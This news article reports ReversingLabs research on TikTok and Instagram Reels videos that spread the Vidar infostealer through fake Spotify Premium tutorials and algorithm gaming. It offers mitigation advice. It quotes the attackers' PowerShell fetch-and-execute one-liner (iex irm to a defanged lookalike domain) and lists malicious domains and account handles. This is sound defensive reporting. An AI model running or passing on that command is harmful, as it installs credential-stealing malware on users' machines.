On June 9, 2026, ReversingLabs documented two ongoing campaigns utilizing TikTok and Instagram Reels to distribute the Vidar infostealer. The attacks employ fake video tutorials for Spotify Premium and other paid software. Threat actors have successfully decoded and exploited the platforms' algorithmic weighting—where saves and shares carry more influence than likes—to organically amplify the visibility of malicious content.
- ReversingLabs identified two distinct campaigns on TikTok and Instagram Reels using fake Spotify Premium tutorials to deliver the Vidar infostealer via PowerShell commands.
- A single video accumulated over 100,000 views, 1,699 saves, and 974 shares; attackers deliberately target saves and shares because recommendation algorithms prioritize these metrics over likes.
- The PowerShell commands follow the structure
iex irm msget[.]run/spotify, which downloads build.exe—confirmed by Spectra Analyze as a Vidar payload. - Malicious accounts
windows.tipsandwindows.insightsmimic Microsoft branding with blue crown avatars, exploiting user familiarity with the brand.
Anatomy of the "Tutorial" Campaign
The first campaign features technically polished videos, AI-generated voiceovers, and accounts that replicate Microsoft’s visual identity. The handles windows.tips and windows.insights are calculated choices: the blue-and-white branding builds a bridge of trust, leading users familiar with Windows toward seemingly legitimate technical instructions.
The videos explicitly guide users to PowerShell, providing vocal or text-based instructions to execute iex irm msget[.]run/spotify—a one-liner combining Invoke-Expression, Invoke-RestMethod, and a lookalike domain. This results in the download of build.exe, identified by ReversingLabs Spectra Analyze as Vidar. This infostealer has been active since 2018 and is marketed as Malware-as-a-Service for a $300 lifetime license. The latest documented update occurred in October 2025, introducing improvements to stability and evasion.
The choice of PowerShell is not a high-risk architectural fluke; it is a legitimate tool present on every Windows system. The average user does not distinguish between a standard system command and one that downloads malware. As ReversingLabs researchers noted: "A non-technical user cannot tell the difference and may assume it is legitimate. Attackers rely on this lack of understanding."
Algorithmic Gaming: Saves and Shares as Leverage
What distinguishes this campaign from simple viral distribution is the attackers' sophisticated understanding of algorithmic weights. ReversingLabs documented 1,699 saves compared to 1,581 likes on a single video that exceeded 100,000 views, alongside 974 shares. The strategy does not aim for superficial popularity but optimizes for the specific metrics that TikTok and Instagram prioritize in their recommendation models.
Saves and shares signal "useful" content or material to be "referenced later," prompting the algorithm to reward them with increased visibility in discovery feeds. Attackers have constructed their videos to maximize these specific interactions rather than passive likes. Consequently, the algorithm organically amplifies the malicious content, extending its reach to users who never searched for pirated software.
"The two approaches are means to different ends, and the differences demonstrate how attackers can exploit different aspects of social media engagement to reach more potential victims" — ReversingLabs Researchers
The Second Campaign: Engagement Baiting and Survey Gates
The second campaign documented by ReversingLabs uses a less technical register: raw videos promising free access to Spotify Premium, with comments enabled as the primary layer of interaction. In this instance, the attack does not begin immediately with PowerShell but with reply-baiting. The attacker responds to comments with links to more detailed tutorials or profile pages that redirect to sites such as d4ug[.]site, pluginchad[.]xyz, and maxapk[.]xyz.
On these domains, access to the promised software is blocked by surveys. ReversingLabs researchers were unable to complete these questionnaires; therefore, the final payload of this second chain remains unverified. It cannot be confirmed that Vidar is the malware delivered here, as the dossier documents a methodological block rather than a result. However, the structure confirms tactical flexibility: while the first campaign focuses on immediate execution, the second builds trust through social interaction prior to delivery.
A narrative control element also emerges in the moderation dynamics. ReversingLabs reports that the creators of the malicious videos systematically delete warning comments. Furthermore, attempts to report the content to Instagram as a scam were rejected during the investigation. The platform allowed material flagged by security researchers to remain active, though the dossier does not specify if accessibility persists at the time of publication.
Analysis: The Algorithm as the Primary Actor
Editorial Insight — Trust is not stolen via a zero-day exploit, but through a gradual transfer. The user sees a recommended video, not a searched one. They see an account with Microsoft branding, not a suspicious domain. They see step-by-step instructions, not a security warning. Each individual step appears legitimate; the chain itself is anything but.
The difference between a viral campaign and an algorithmic campaign lies in targeting. Virality depends on human sharing; algorithmic reach depends on the mathematical weight a platform assigns to specific interactions. Attackers here have understood and exploited this distinction, optimizing for saves and shares rather than passive likes.
Context: A Recurring Pattern, Not an Isolated Case
Trend Micro previously documented the same technical stack in 2025: TikTok videos, ClickFix tactics, PowerShell commands, and the Vidar and StealC infostealers. Trend Micro researchers observed videos that "verbally instruct viewers to execute a sequence of commands to supposedly activate legitimate software, such as Windows OS, Microsoft Office, CapCut, and Spotify." They concluded that "this campaign highlights how attackers are ready to exploit whatever social media platform is currently popular to distribute malware."
The ReversingLabs research, published June 9, 2026, documents campaign activity with an undetermined prior duration. Malwarebytes has corroborated these findings, noting that similar TikTok-based attacks commonly add Windows Defender exclusions to facilitate persistence.
Mitigation and Defense
The following recommendations are editorially derived from the documented facts and are not direct mandates from the primary sources.
- Recognize that video tutorials for pirated or "free" software on social platforms require independent verification: no legitimate technical brand guides users toward PowerShell via social media.
- Verify that PowerShell commands proposed in social content do not use
iex irmpatterns with external domains; this structure executes remote code without oversight. - Report accounts mimicking Microsoft branding with names like
windows.tipsorwindows.insights: corporate identity impersonation is a documented campaign indicator. - Consider that high save and share counts on technical content may reflect malicious algorithmic optimization rather than authentic quality.
Closing
The campaign documented by ReversingLabs on June 9, 2026, demonstrates two distinct methodologies united by a common principle: an understanding of platform recommendation mechanisms. While the first campaign targets immediate technical execution, the second builds trust through social interaction. Both exploit the same vulnerability—user familiarity with the interface and the algorithm—to transform entertainment platforms into malware distribution channels.
The original research was conducted by ReversingLabs; other cited sources report the same findings without independent technical analysis. Information is based on the report published June 9, 2026, with previous campaign activity of undetermined duration.
Information has been verified against the cited sources and is current at the time of publication.
Sources
- https://www.reversinglabs.com/blog/social-media-attacks-phishing
- https://www.helpnetsecurity.com/2026/06/11/vidar-infostealer-tiktok-instagram-reels-malware-campaigns/
- https://www.malwarebytes.com/blog/news/2026/06/free-spotify-premium-hacks-on-social-media-are-spreading-infostealers
- https://www.infosecurity-magazine.com/news/fake-software-videos-tiktok-vidar/
- https://www.helpnetsecurity.com/2025/05/23/tiktok-videos-clickfix-tactic-infostealer-malware-infection/
- https://unit42.paloaltonetworks.com/flutterbridge-new-fluttershell-backdoor/
- https://thehackernews.com/2026/06/fifa-world-cup-2026-scams-are-already.html
- https://unit42.paloaltonetworks.com/tracking-tampered-chef-clusters/